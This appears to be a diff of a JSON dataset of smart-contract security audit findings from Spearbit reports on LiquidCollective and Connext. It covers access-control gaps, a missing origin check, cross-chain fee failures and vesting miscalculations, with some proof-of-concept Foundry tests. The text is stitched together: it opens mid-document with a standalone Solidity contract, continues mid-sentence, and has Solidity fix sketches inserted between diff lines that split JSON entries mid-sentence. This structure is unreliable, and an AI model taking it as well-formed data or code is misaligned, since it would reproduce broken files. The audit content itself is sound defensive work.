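contract BoundedRootQueue {
    bytes32[] internal pending;                 // simplified stand-in for pendingInboundRoots
    uint256 internal head;                      // index of the next unprocessed root
    uint256 public constant MAX_DEQUEUE = 100;  // hypothetical per-call cap

    function dequeueUpToCap() internal returns (bytes32[] memory out) {
        uint256 available = pending.length - head;
        uint256 n = available < MAX_DEQUEUE ? available : MAX_DEQUEUE; // cap gas per call
        out = new bytes32[](n);
        for (uint256 i = 0; i < n; i++) {
            out[i] = pending[head + i];
        }
        // An attacker queueing thousands of roots now only delays aggregation;
        // repeated propagate() calls drain the queue instead of reverting.
        head += n;
    }
}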
The second scenario is particularly important because it does not allow the creator to reduce the length or remove the schedule entirely in case the schedule has been created mistakenly or with a misconfiguration (too many token vested, lock period too long, etc...).", + "title": "Missing mirrorConnector check on Optimism hub connector", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "processMessageFromRoot() calls _processMessage() to process messages for the \"fast\" path. But _processMessage() can also be called by the AMB in the slow path. The second call to _processMessage() is not necessary (and could double process the message, which luckily is prevented via the processed[] mapping). The second call (from the AMB directly to _processMessage()) also doesn't properly verify the origin of the message, which might allow the insertion of fraudulent messages. function processMessageFromRoot(...) ... { ... _processMessage(abi.encode(_data)); ... } function _processMessage(bytes memory _data) internal override { // sanity check root length require(_data.length == 32, \"!length\"); // get root from data bytes32 root = bytes32(_data); if (!processed[root]) { // set root to processed processed[root] = true; // update the root on the root manager IRootManager(ROOT_MANAGER).aggregate(MIRROR_DOMAIN, root); } // otherwise root was already sent to root manager }", "labels": [ "Spearbit", - "LiquidCollective2", - "Severity: Informational" + "ConnextNxtp", + "Severity: High Risk" ] }, { - "title": "getVestingSchedule returns misleading information if the vesting token creator revokes the sched- ule", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", - "body": "The getVestingSchedule function returns the information about the created vesting schedule. The duration represents the number of seconds of the vesting period and the amount represents the number of tokens that have been scheduled to be released after the period end (or after lockDuration if it has been configured to be greater than end). If the creator of the vesting schedule calls revokeVestingSchedule, only the end of the vesting schedule struct will be updated. If external contracts or dApps rely only on the getVestingSchedule information there could be scenarios where they display or base their logic on wrong information. Consider the following example. Alluvial creates a vesting schedule for alice with the following config 18 { } \"start\": block.timestamp, \"cliffDuration\": 1 days, \"lockDuration\": 0, \"duration\": 10 days, \"period\": 1 days, \"amount\": 10, \"beneficiary\": alice, \"delegatee\": alice, \"revocable\": true This means that after 10 days, Alice would own in her balance 10 TLC tokens. If Alluvial calls revokeVestingSchedule before the cliff period ends, all of the tokens will be returned to Alluvial but the getVestingSchedule function would still display the same information with just the end attribute updated.
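The origin check the Optimism finding above asks for can be sketched as follows (assumed messenger interface based on Optimism's standard xDomainMessageSender pattern; not the audited code):

pragma solidity ^0.8.15;

interface IOptimismMessengerLike {
    function xDomainMessageSender() external view returns (address);
}

abstract contract CheckedOptimismConnector {
    address public immutable AMB;
    address public immutable MIRROR_CONNECTOR;

    constructor(address amb, address mirror) {
        AMB = amb;
        MIRROR_CONNECTOR = mirror;
    }

    function _verifySender() internal view returns (bool) {
        // msg.sender must be the messenger itself, and the cross-domain sender
        // must be the configured mirror connector on the other domain.
        return msg.sender == AMB && IOptimismMessengerLike(AMB).xDomainMessageSender() == MIRROR_CONNECTOR;
    }
}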
An external dApp or contract that does not check the new end and compares it to cliffDuration, lockDura- tion, and period but only uses the amount would display the wrong number of vested tokens for Alice at a given timestamp.", + "title": "Add _mirrorConnector to _sendMessage of BaseMultichain", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The function _sendMessage() of BaseMultichain sends the message to the address of the _amb. This doesn't seem right, as according to the Multichain cross-chain documentation the first parameter is the target contract to interact with. This should probably be the _mirrorConnector. function _sendMessage(address _amb, bytes memory _data) internal { Multichain(_amb).anyCall( _amb, // Same address on every chain, using AMB as it is immutable ... ); }", "labels": [ "Spearbit", - "LiquidCollective2", - "Severity: Informational" + "ConnextNxtp", + "Severity: High Risk" ] }, { - "title": "The computeVestingVestedAmount will return the wrong amount of vested tokens if the creator of the vested schedule revokes the schedule", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", - "body": "The computeVestingVestedAmount will return the wrong amount of vested tokens if the creator of the vested schedule revokes the schedule. This function returns the value returned by _computeVestedAmount that relies on duration and amount while the only attribute changed by revokeVestingSchedule is the end. 19 function _computeVestedAmount(VestingSchedules.VestingSchedule memory _vestingSchedule, uint256 _time) internal pure returns (uint256) { if (_time < _vestingSchedule.start + _vestingSchedule.cliffDuration) { // pre-cliff no tokens have been vested return 0; } else if (_time >= _vestingSchedule.start + _vestingSchedule.duration) { // post vesting all tokens have been vested return _vestingSchedule.amount; } else { uint256 timeFromStart = _time - _vestingSchedule.start; // compute tokens vested for completly elapsed periods uint256 vestedDuration = timeFromStart - (timeFromStart % _vestingSchedule.period); return (vestedDuration * _vestingSchedule.amount) / _vestingSchedule.duration; } } If the creator revokes the schedule, the computeVestingVestedAmount would return more tokens compared to the amount that the user has vested in reality. Consider the following example. Alluvial creates a vesting schedule with the following config { } \"start\": block.timestamp, \"cliffDuration\": 1 days, \"lockDuration\": 0, \"duration\": 10 days, \"period\": 1 days, \"amount\": 10, \"beneficiary\": alice, \"delegatee\": alice, \"revocable\": true Alluvial then calls revokeVestingSchedule(0, uint64(block.timestamp + 5 days));. The effect of this trans- action would return 5 tokens to Alluvial and set the new end to block.timestamp + 5 days. If alice calls computeVestingVestedAmount(0) at the time uint64(block.timestamp + 7 days), it would return 7 because _computeVestedAmount would execute the code in the else branch. But alice cannot have more than 5 vested tokens because of the previous revoke. If alice calls computeVestingVestedAmount(0) at the time uint64(block.timestamp + duration)it would return 10 because _computeVestedAmount would execute the code in the else if (_time >= _vestingSchedule.start + _vestingSchedule.duration) branch. But alice cannot have more than 5 vested tokens because of the previous revoke.
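For the BaseMultichain finding above, a sketch of the suggested change, reusing the anyCall shape quoted in the finding (the five-argument interface below is trimmed for illustration):

pragma solidity ^0.8.15;

interface Multichain {
    function anyCall(address _to, bytes calldata _data, address _fallback, uint256 _toChainID, uint256 _flags) external;
}

abstract contract MultichainSendFix {
    uint256 public immutable MIRROR_CHAIN_ID;
    address public immutable MIRROR_CONNECTOR;

    constructor(uint256 chainId, address mirror) {
        MIRROR_CHAIN_ID = chainId;
        MIRROR_CONNECTOR = mirror;
    }

    function _sendMessage(address _amb, bytes memory _data) internal {
        Multichain(_amb).anyCall(
            MIRROR_CONNECTOR, // the contract to execute on the destination chain, not the AMB
            _data,
            address(0),       // fallback address on origin chain
            MIRROR_CHAIN_ID,
            0                 // fee paid on origin chain
        );
    }
}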
Attached test below to reproduce it: //SPDX-License-Identifier: MIT pragma solidity 0.8.10; import \"forge-std/Test.sol\"; import \"../src/TLC.1.sol\"; contract WrappedTLC is TLCV1 { 20 function __computeVestingReleasableAmount(uint256 vestingID, uint256 _time) external view returns (uint256) { ,! return _computeVestingReleasableAmount( VestingSchedules.get(vestingID), _deterministicVestingEscrow(vestingID), _time ); } } contract SpearTLCTest is Test { WrappedTLC internal tlc; address internal escrowImplem; address internal initAccount; address internal creator; address internal bob; address internal alice; address internal carl; function setUp() public { initAccount = makeAddr(\"init\"); creator = makeAddr(\"creator\"); bob = makeAddr(\"bob\"); alice = makeAddr(\"alice\"); carl = makeAddr(\"carl\"); tlc = new WrappedTLC(); tlc.initTLCV1(initAccount); } function testIncorrectComputeVestingVestedAmount() public { vm.prank(initAccount); tlc.transfer(creator, 10); // create a vesting schedule for Alice vm.prank(creator); createVestingSchedule( VestingSchedule({ start: block.timestamp, cliffDuration: 0 days, lockDuration: 0, // no lock duration: 10 days, period: 1 days, amount: 10, beneficiary: alice, delegatee: address(0), revocable: true }) ); // creator call revokeVestingSchedule revoking the vested schedule setting the new end as half ,! of the duration // 5 tokens are returned to the creator and `end` is updated to the new value // this means also that at max alice will have 5 token vested (and releasable) vm.prank(creator); tlc.revokeVestingSchedule(0, uint64(block.timestamp + 5 days)); // We warp at day 7 of the schedule vm.warp(block.timestamp + 7 days); 21 // This should fail because alice at max have only 5 token vested because of the revoke assertEq(tlc.computeVestingVestedAmount(0), 7); // We warp at day 10 (we reached the total duration of the vesting) vm.warp(block.timestamp + 3 days); // This should fail because alice at max have only 5 token vested because of the revoke assertEq(tlc.computeVestingVestedAmount(0), 10); } struct VestingSchedule { uint256 start; uint256 cliffDuration; uint256 lockDuration; uint256 duration; uint256 period; uint256 amount; address beneficiary; address delegatee; bool revocable; } function createVestingSchedule(VestingSchedule memory config) internal returns (uint256) { return createVestingScheduleStackOptimized(config); } function createVestingScheduleStackOptimized(VestingSchedule memory config) internal returns (uint256) { ,! return tlc.createVestingSchedule( uint64(config.start), uint32(config.cliffDuration), uint32(config.duration), uint32(config.period), uint32(config.lockDuration), config.revocable, config.amount, config.beneficiary, config.delegatee ); } }", + "title": "Unauthorized access to change acceptanceDelay", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The acceptanceDelay along with supportedInterfaces[] can be set by any user without the need of any Authorization once the init function of DiamondInit has been called and set. This is happening since caller checks (LibDiamond.enforceIsContractOwner();) are missing for these fields. 
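The missing authorization described in the acceptanceDelay finding can be sketched as follows (LibDiamondLike stands in for the LibDiamond.enforceIsContractOwner() check named in the finding; the setter name is hypothetical):

pragma solidity ^0.8.15;

library LibDiamondLike {
    // Stand-in for LibDiamond.enforceIsContractOwner(), which reverts
    // unless msg.sender is the diamond's contract owner.
    function enforceIsContractOwner() internal view {
        // ... owner check elided in this sketch ...
    }
}

contract DiamondInitSketch {
    uint256 internal acceptanceDelay;

    function setAcceptanceDelay(uint256 _delay) external {
        LibDiamondLike.enforceIsContractOwner(); // the caller check the finding says is missing
        acceptanceDelay = _delay;
    }
}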
Since acceptanceDelay defines the time after which certain actions can be executed, setting a very large value could DOS the system (a new owner could not be set), while setting a very low value could let changes take effect without adequate consideration time (setting/renouncing the Admin, disabling whitelisting, etc. in ProposedOwnableFacet.sol)", "labels": [ "Spearbit", - "LiquidCollective2", - "Severity: Informational" + "ConnextNxtp", + "Severity: High Risk" ] }, { - "title": "Consider writing clear documentation on how the voting power and delegation works", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", - "body": "ERC20VotesUpgradeable contract. As the official OpenZeppelin documentation says (also reported in the Alluvial's natspec contract): ERC20VestableVotesUpgradeableV1 extension The an of is By default, token balance does not account for voting power. This makes transfers cheaper. The downside is that it requires users to delegate to themselves in order to activate checkpoints and have their voting power tracked. Because of how ERC20VotesUpgradeable behaves on voting power and delegation of voting power could be coun- terintuitive for normal users who are not aware of it, Alluvial should be very explicit on how users should act when a vesting schedule is created for them. When a Vote Token is transferred, ERC20VotesUpgradeable calls the hook _afterTokenTransfer function _afterTokenTransfer( address from, address to, uint256 amount ) internal virtual override { super._afterTokenTransfer(from, to, amount); _moveVotingPower(delegates(from), delegates(to), amount); } In this case, _moveVotingPower(delegates(from), delegates(to), amount); will decrease the voting power of delegates(from) by amount and will increase the voting power of delegates(to) by amount. This applies if some conditions are true, but you can see them here function _moveVotingPower( address src, address dst, uint256 amount ) private { if (src != dst && amount > 0) { if (src != address(0)) { (uint256 oldWeight, uint256 newWeight) = _writeCheckpoint(_checkpoints[src], _subtract, ,! amount); emit DelegateVotesChanged(src, oldWeight, newWeight); } if (dst != address(0)) { (uint256 oldWeight, uint256 newWeight) = _writeCheckpoint(_checkpoints[dst], _add, amount); emit DelegateVotesChanged(dst, oldWeight, newWeight); } } } When a vesting schedule is created, the creator has two options: 1) Specify a custom delegatee different from the beneficiary (or equal to it, but it's the same as option 2). 2) Leave the delegatee empty (equal to address(0)). Scenario 1) empty delegatee OR delegatee === beneficiary (same thing) After creating the vesting schedule, the voting power of the beneficiary will be equal to the amount of tokens vested. If the beneficiary did not call tlc.delegate(beneficiary) previously, after releasing some tokens, its voting power will be decreased by the amount of released tokens. 23 Scenario 2) delegatee !== beneficiary && delegatee !== address(0) Same thing as before, but now we have two different actors, one is the beneficiary and another one is the delegatee of the voting power of the vested tokens. If the beneficiary did not call tlc.delegate(vestingScheduleDelegatee) previously, after releasing some to- kens, the voting power of the current vested schedule's delegatee will be decreased by the amount of released tokens.
Related test for scenario 1 //SPDX-License-Identifier: MIT pragma solidity 0.8.10; import \"forge-std/Test.sol\"; import \"../src/TLC.1.sol\"; contract WrappedTLC is TLCV1 { function deterministicVestingEscrow(uint256 _index) external view returns (address escrow) { return _deterministicVestingEscrow(_index); } } contract SpearTLCTest is Test { WrappedTLC internal tlc; address internal escrowImplem; address internal initAccount; address internal bob; address internal alice; address internal carl; function setUp() public { initAccount = makeAddr(\"init\"); bob = makeAddr(\"bob\"); alice = makeAddr(\"alice\"); carl = makeAddr(\"carl\"); tlc = new WrappedTLC(); tlc.initTLCV1(initAccount); } function testLosingPowerAfterRelease() public { // create a vesting schedule for Alice vm.prank(initAccount); createVestingSchedule( VestingSchedule({ start: block.timestamp, cliffDuration: 1 days, lockDuration: 0, // no lock duration: 10 days, period: 1 days, amount: 10, beneficiary: alice, delegatee: address(0), revocable: false }) ); address aliceEscrow = tlc.deterministicVestingEscrow(0); assertEq(tlc.getVotes(alice), 10); 24 assertEq(tlc.balanceOf(alice), 0); // Cliff period has passed and Alice try to get the first batch of the vested token vm.warp(block.timestamp + 1 days); vm.prank(alice); tlc.releaseVestingSchedule(0); // Alice now owns the vested tokens just released but her voting power has decreased by the ,! amount released assertEq(tlc.getVotes(alice), 9); assertEq(tlc.balanceOf(alice), 1); } struct VestingSchedule { uint256 start; uint256 cliffDuration; uint256 lockDuration; uint256 duration; uint256 period; uint256 amount; address beneficiary; address delegatee; bool revocable; } function createVestingSchedule(VestingSchedule memory config) internal returns (uint256) { return createVestingScheduleStackOptimized(config); } function createVestingScheduleStackOptimized(VestingSchedule memory config) internal returns (uint256) { ,! return tlc.createVestingSchedule( uint64(config.start), uint32(config.cliffDuration), uint32(config.duration), uint32(config.period), uint32(config.lockDuration), config.revocable, config.amount, config.beneficiary, config.delegatee ); } }", + "title": "Messages destined for ZkSync cannot be processed", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "For ZkSync chain, L2 to L1 communication is free, but L1 to L2 communication requires a certain amount of ETH to be supplied to cover the base cost of the transaction (including the _l2Value) + layer 2 operator tip. The _sendMessage function of ZkSyncHubConnector.sol relies on the IZkSync(AMB).requestL2Transaction function to send messages from L1 to L2. However, the requestL2Transaction call will always fail because no ETH is supplied to the transaction (msg.value is zero). As a result, the ZkSync's hub connector on Ethereum cannot forward the latest aggregated Merkle root to the ZkSync's spoke connector on ZkSync chain. Thus, any message destined for ZkSync chain cannot be processed since incoming messages cannot be proven without the latest aggregated Merkle root. 
function _sendMessage(bytes memory _data) internal override { // Should always be dispatching the aggregate root require(_data.length == 32, \"!length\"); // Get the calldata bytes memory _calldata = abi.encodeWithSelector(Connector.processMessage.selector, _data); // Dispatch message // https://v2-docs.zksync.io/dev/developer-guides/Bridging/l1-l2.html#structure // calling L2 smart contract from L1 Example contract // note: msg.value must be passed in and can be retrieved from the AMB view function `l2TransactionBaseCost` // https://v2-docs.zksync.io/dev/developer-guides/Bridging/l1-l2.html#using-contract-interface-in-your-project IZkSync(AMB).requestL2Transaction{value: msg.value}( // The address of the L2 contract to call mirrorConnector, // We pass no ETH with the call 0, // Encoding the calldata for the execute _calldata, // Ergs limit 10000, // factory dependencies new bytes[](0) ); }", "labels": [ "Spearbit", - "LiquidCollective2", - "Severity: Informational" + "ConnextNxtp", + "Severity: High Risk" ] }, { - "title": "Fix mismatch between revert error message and code behavior", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", - "body": "The error message requires the schedule duration to be greater than the cliff duration, but the code allows it to be greater than or equal to the cliff duration.", + "title": "Cross-chain messaging via Multichain protocol will fail", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Multichain v6 is supported by Connext for cross-chain messaging. The _sendMessage function of BaseMultichain.sol relies on Multichain's anyCall for cross-chain messaging. Per the Anycall V6 documentation, a gas fee for transaction execution needs to be paid either on the source or destination chain when an anyCall is called. However, the anyCall is called without consideration of the gas fee within the connectors, and thus the anyCall will always fail. Since Multichain's hub and spoke connectors are unable to send messages, cross-chain messaging using Multichain within Connext will not work. function _sendMessage(address _amb, bytes memory _data) internal { Multichain(_amb).anyCall( _amb, // Same address on every chain, using AMB as it is immutable _data, address(0), // fallback address on origin chain MIRROR_CHAIN_ID, 0 // fee paid on origin chain ); } Additionally, for the payment of the execution gas fee, a project can choose to implement either of the following methods: Pay on the source chain by depositing the gas fee to the caller contracts. Pay on the destination chain by depositing the gas fee to Multichain's anyCall contract at the destination chain. If Connext decides to pay the gas fee on the source chain, they would need to deposit some ETH to the connector contracts.
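Both the ZkSync and Multichain findings hinge on the connectors being unable to hold ETH for AMB fees; a minimal sketch of a funding path (hypothetical contract, not the audited code) would be as simple as:

pragma solidity ^0.8.15;

abstract contract FundableConnector {
    event Funded(address indexed from, uint256 amount);

    // Accept plain ETH transfers so the owner or keepers can top up
    // the fee budget used for requestL2Transaction / anyCall fees.
    receive() external payable {
        emit Funded(msg.sender, msg.value);
    }
}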
However, it is not possible because no receive(), fallback or payable function has been implemented within the contracts and their parent contracts for accepting ETH.", "labels": [ "Spearbit", - "LiquidCollective2", - "Severity: Informational" + "ConnextNxtp", + "Severity: High Risk" ] }, { - "title": "Improve documentation and naming of period variable", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", - "body": "Similar to Consider renaming period to periodDuration to be more descriptive, the variable name and documentation are ambiguous. We can give a more descriptive name to the variable and fix the documenta- tion.", + "title": "_domainSeparatorV4() not updated after name/symbol change", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The BridgeToken allows updating the name and symbol of a token. However, the _CACHED_DOMAIN_SEPARATOR (of EIP712) isn't updated. This means that permit(), which uses _hashTypedDataV4() and _CACHED_DOMAIN_SEPARATOR, still uses the old value. On the other hand DOMAIN_SEPARATOR() is updated. Both, and especially their combination, can give unexpected results. BridgeToken.sol function setDetails(string calldata _newName, string calldata _newSymbol) external override onlyOwner { // careful with naming convention change here token.name = _newName; token.symbol = _newSymbol; emit UpdateDetails(_newName, _newSymbol); } OZERC20.sol function DOMAIN_SEPARATOR() external view override returns (bytes32) { // See {EIP712._buildDomainSeparator} return keccak256( abi.encode(_TYPE_HASH, keccak256(abi.encode(token.name)), _HASHED_VERSION, block.chainid, address(this)) ); } function permit(...) ... { ... bytes32 _hash = _hashTypedDataV4(_structHash); ... } draft-EIP712.sol import \"./EIP712.sol\"; EIP712.sol function _hashTypedDataV4(bytes32 structHash) internal view virtual returns (bytes32) { return ECDSA.toTypedDataHash(_domainSeparatorV4(), structHash); } function _domainSeparatorV4() internal view returns (bytes32) { if (address(this) == _CACHED_THIS && block.chainid == _CACHED_CHAIN_ID) { return _CACHED_DOMAIN_SEPARATOR; } else { return _buildDomainSeparator(_TYPE_HASH, _HASHED_NAME, _HASHED_VERSION); } }", "labels": [ "Spearbit", - "LiquidCollective2", - "Severity: Informational" + "ConnextNxtp", + "Severity: Medium Risk" ] }, { - "title": "Consider renaming period to periodDuration to be more descriptive", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", - "body": "period can be confused as (for example) a counter or an id.", + "title": "diamondCut() allows re-execution of old updates", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Once diamondCut() is executed, ds.acceptanceTimes[keccak256(abi.encode(_diamondCut, _init, _calldata))] is not reset to zero. This means the contract owner can rerun the old updates again without any delay by executing the diamondCut() function.
Assume the following: 1. The diamondCut() function is executed to update a facet selector to version_2. 2. A bug is found in version_2 and it is rolled back. 3. The owner can still execute the diamondCut() function, which will again update the facet selector to version_2, since ds.acceptanceTimes[keccak256(abi.encode(_diamondCut, _init, _calldata))] is still valid", "labels": [ "Spearbit", - "LiquidCollective2", - "Severity: Informational" + "ConnextNxtp", + "Severity: Medium Risk" ] }, { - "title": "Consider removing coverageFunds variable and explicitly initialize executionLayerFees to zero", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", - "body": "Inside the OracleManager.setConsensusLayerData the coverageFunds variable is declared but never used. Consider cleaning the code by removing the unused variable. The executionLayerFees variable instead should be explicitly initialized to zero to not rely on compiler assump- tions.", + "title": "User may not be able to override slippage on destination", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "If BridgeFacet.execute() is executed before BridgeFacet.forceUpdateSlippage(), the user won't be able to update slippage on the destination chain. In this case, the slippage specified on the source chain is used. Due to different conditions on these chains, a user may want to specify different slippage values. This can result in user loss, as a slippage higher than necessary will result in the swap trade being sandwiched.", "labels": [ "Spearbit", - "LiquidCollective2", - "Severity: Informational" + "ConnextNxtp", + "Severity: Medium Risk" ] }, { - "title": "Consider renaming IVestingScheduleManagerV1 interface to IERC20VestableVotesUpgradeableV1", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", - "body": "The IVestingScheduleManager interface contains all ERC20VestableVotesUpgradeableV1 needs to implement and use. the events, errors, and functions that Because there's no corresponding VestingScheduleManager contract implementation, it would make sense to rename the interface to IERC20VestableVotesUpgradeableV1.", + "title": "Do not rely on token balance to determine when cap is reached", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Connext Diamond defines a cap on each token. Any transfer making the total token balance more than the cap is reverted. uint256 custodied = IERC20(_local).balanceOf(address(this)) + _amount; uint256 cap = s.caps[key]; if (cap > 0 && custodied > cap) { revert RoutersFacet__addLiquidityForRouter_capReached(); } Anyone can send tokens to Connext Diamond to artificially increase the custodied amount since it depends on the token balance. This can be an expensive attack but it can become viable if the price of a token (including next assets) drops.", "labels": [ - "Spearbit", - "LiquidCollective2", - "Severity: Informational" + "Spearbit", + "ConnextNxtp", + "Severity: Medium Risk" ] }, { - "title": "Consider renaming CoverageFundAddress COVERAGE_FUND_ADDRESS to be consistent with the current naming convention", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", - "body": "Consider renaming the constant used to access the unstructured storage slot COVERAGE_FUND_- ADDRESS.
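The balance-based cap check from the finding above can instead track custody internally; a minimal sketch with assumed names (not the audited storage layout):

pragma solidity ^0.8.15;

abstract contract TrackedCustody {
    mapping(bytes32 => uint256) internal custodied; // per canonical key
    mapping(bytes32 => uint256) internal caps;

    error CapReached();

    function _recordIn(bytes32 key, uint256 amount) internal {
        // Only amounts moved through the protocol count toward the cap;
        // tokens donated directly to the diamond no longer inflate it.
        uint256 newCustodied = custodied[key] + amount;
        uint256 cap = caps[key];
        if (cap > 0 && newCustodied > cap) revert CapReached();
        custodied[key] = newCustodied;
    }

    function _recordOut(bytes32 key, uint256 amount) internal {
        custodied[key] -= amount;
    }
}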
To follow the naming convention already adopted across all the contracts, the variable should be renamed to COVERAGE_FUND_ADDRESS_SLOT.", + "title": "Router recipient can be configured more than once", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The comments from the setRouterRecipient function mention that the router should only be able to set the recipient once. Otherwise, no problem is solved. However, based on the current implementation, it is possible for the router to set its recipient more than once. File: RoutersFacet.sol 394: /** 395: * @notice Sets the designated recipient for a router 396: * @dev Router should only be able to set this once otherwise if router key compromised, 397: * no problem is solved since attacker could just update recipient 398: * @param router Router address to set recipient 399: * @param recipient Recipient Address to set to router 400: */ 401: function setRouterRecipient(address router, address recipient) external onlyRouterOwner(router) { Let's assume that during router setup, the setupRouter function is being called and the owner is set to Alice's first EOA (0x123), and the recipient is set to Alice's second EOA (0x456). Although the comment mentioned that the setRouterRecipient should only be set once, this is not true because this function will only revert if _prevRecipient == recipient. As long as the new recipient is not the same as the previous recipient, the function will happily accept the new recipient. Therefore, if the router's signing key is compromised by Bob (attacker), he could call the setRouterRecipient function to change the new recipient to his personal EOA and drain the funds within the router. The setRouterRecipient function is protected by the onlyRouterOwner modifier. Since Bob has the compromised router's signing key, he will be able to pass this validation check. File: RoutersFacet.sol 157: /** 158: * @notice Asserts caller is the router owner (if set) or the router itself 159: */ 160: modifier onlyRouterOwner(address _router) { 161: address owner = s.routerPermissionInfo.routerOwners[_router]; 162: if (!((owner == address(0) && msg.sender == _router) || owner == msg.sender)) 163: revert RoutersFacet__onlyRouterOwner_notRouterOwner(); 164: _; 165: } The second validation is at Line 404, which checks if the new recipient is not the same as the previous recipient. The recipient variable is set to Bob's EOA wallet, while the _prevRecipient variable is set to Alice's second EOA (0x456). Therefore, the condition at Line 404 is False, and it will not revert. So Bob successfully sets the recipient to his EOA at Line 407. File: RoutersFacet.sol 401: function setRouterRecipient(address router, address recipient) external onlyRouterOwner(router) { 402: // Check recipient is changing 403: address _prevRecipient = s.routerPermissionInfo.routerRecipients[router]; 404: if (_prevRecipient == recipient) revert RoutersFacet__setRouterRecipient_notNewRecipient(); 405: 406: // Set new recipient 407: s.routerPermissionInfo.routerRecipients[router] = recipient; Per the Github discussion, the motivation for such a design is the following: If a router's signing key is compromised, the attacker could drain the liquidity stored on the contract and send it to any specified address. This effectively means the key is in control of all unused liquidity on chain, which prevents router operators from adding large amounts of liquidity directly to the contract.
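The set-once semantics the finding calls for can be sketched as follows (assumed storage layout taken from the quoted code; not the audited implementation):

pragma solidity ^0.8.15;

abstract contract SetOnceRecipient {
    mapping(address => address) internal routerRecipients;

    error RecipientAlreadySet();

    function setRouterRecipient(address router, address recipient) external /* onlyRouterOwner(router) */ {
        // Truly set-once: a compromised router key cannot redirect
        // liquidity after the recipient has been configured.
        if (routerRecipients[router] != address(0)) revert RecipientAlreadySet();
        routerRecipients[router] = recipient;
    }
}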
Routers should be able to delegate the safe withdrawal address of any unused liquidity, creating a separation of concerns between router key and liquidity safety. In summary, the team is trying to create a separation of concerns between router key and liquidity safety. With the current implementation, there is no security benefit in segregating the router owner role and recipient role unless the router owner has been burned (e.g. set to address zero), because once the router's signing key is compromised, the attacker can change the recipient anyway. The security benefits of separation of concerns will only be achieved if the recipient can truly be set only once.", "labels": [ "Spearbit", - "LiquidCollective2", - "Severity: Informational" + "ConnextNxtp", + "Severity: Medium Risk" ] }, { - "title": "Consider reverting if the msg.value is zero in CoverageFundV1.donate", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", - "body": "In the current implementation of CoverageFundV1.donate there is no check on the msg.value value. Because of this, the sender can \"spam\" the function and emit multiple useless Donate events.", + "title": "The set of tokens in an internal swap pool cannot be updated", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Once a swap is initialized by the owner or an admin (indexed by the key parameter), the _pooledTokens, i.e. the set of tokens used in this stable swap pool, cannot be updated. Now the s.swapStorages[_key] pools are used in other facets for assets that have the hash of their canonical token id and canonical domain equal to _key, for example when we need to swap between a local and adopted asset, or when a user provides liquidity or interacts with other external endpoints of StableSwapFacet. If the set of tokens _pooledTokens submitted to this pool includes, besides the local and adopted tokens corresponding to _key, some other bad/malicious tokens, users' funds can be at risk in the pool in question. If this happens, we need to pause the protocol, push an update, and initializeSwap again.", "labels": [ "Spearbit", - "LiquidCollective2", - "Severity: Informational" + "ConnextNxtp", + "Severity: Medium Risk" ] }, { - "title": "Consider having a separate function in River contract that allows CoverageFundV1 to send funds instead of using the same function used by ELFeeRecipientV1", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", - "body": "When the River contract calls the CoverageFundV1 contract to pull funds, the CoverageFundV1 sends funds to River by calling IRiverV1(payable(river)).sendELFees{value: amount}();. sendELFees is a function that is currently used by both CoverageFundV1 and ELFeeRecipientV1.
function sendELFees() external payable { if (msg.sender != ELFeeRecipientAddress.get() && msg.sender != CoverageFundAddress.get()) { revert LibErrors.Unauthorized(msg.sender); } } It would be cleaner to have a separate function callable only by the CoverageFundV1 contract.", + "title": "An incorrect decimal supplied to initializeSwap for a token cannot be corrected", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Once a swap is initialized by the owner or an admin (indexed by the key parameter), the decimal precisions of the tokens, and therefore tokenPrecisionMultipliers, cannot be changed. If the supplied decimals include a wrong value, it would cause incorrect calculations when a swap is made, and currently there is no update mechanism for tokenPrecisionMultipliers nor a mechanism for removing the swapStorages[_key].", "labels": [ "Spearbit", - "LiquidCollective2", - "Severity: Informational" + "ConnextNxtp", + "Severity: Medium Risk" ] }, { - "title": "Extensively document how the Coverage Funds contract works", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", - "body": "The Coverage Fund contract has a crucial role inside the Protocol, and the current contract's docu- mentation does not properly cover all the needed aspects. Consider documenting the following aspects: General explanation of the Coverage Funds and it's purpose. Will 